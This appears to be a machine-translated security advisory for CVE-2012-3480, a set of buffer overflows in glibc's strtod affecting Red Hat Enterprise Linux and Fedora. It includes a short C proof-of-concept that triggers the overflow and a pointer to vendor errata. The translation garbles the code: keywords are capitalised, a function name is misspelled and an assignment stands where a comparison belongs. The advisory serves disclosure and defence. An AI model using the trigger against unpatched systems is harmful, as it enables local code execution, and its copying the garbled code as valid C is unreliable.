Release date:
Updated on:
Affected Systems:
RedHat Enterprise Linux 6
RedHat Enterprise Linux 5.0
RedHat Fedora 17
RedHat Fedora 16
Description:
--------------------------------------------------------------------------------
Bugtraq id: 54982
Cve id: CVE-2012-3480
Glibc is the implementation of C libraries in most Linux operating systems.
GNU glibc has multiple buffer overflow vulnerabilities. Local attackers can exploit these vulnerabilities to execute arbitrary code.
<* Source: Joseph S. Myer
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Joseph S. Myer () provides the following test methods:
Include <stdio. h>
# Include <stdlib. h>
# Include <string. h>
# Define EXPONENT "e-2147483649"
# Define SIZE 214748364
Int
Main (void)
{
Char * p = malloc (1 + SIZE + sizeof (EXPONENT ));
If (p = NULL)
{
Perror ("malloc ");
Exit (EXIT_FAILURE );
}
P [0] = '1 ';
Memset (p + 1, '0', SIZE );
Memcpy (p + 1 + SIZE, EXPONENT, sizeof (EXPONENT ));
Double d = strtodd (p, NULL );
Printf ("% a \ n", d );
Exit (EXIT_SUCCESS );
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
RedHat
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.redhat.com/apps/support/errata/index.html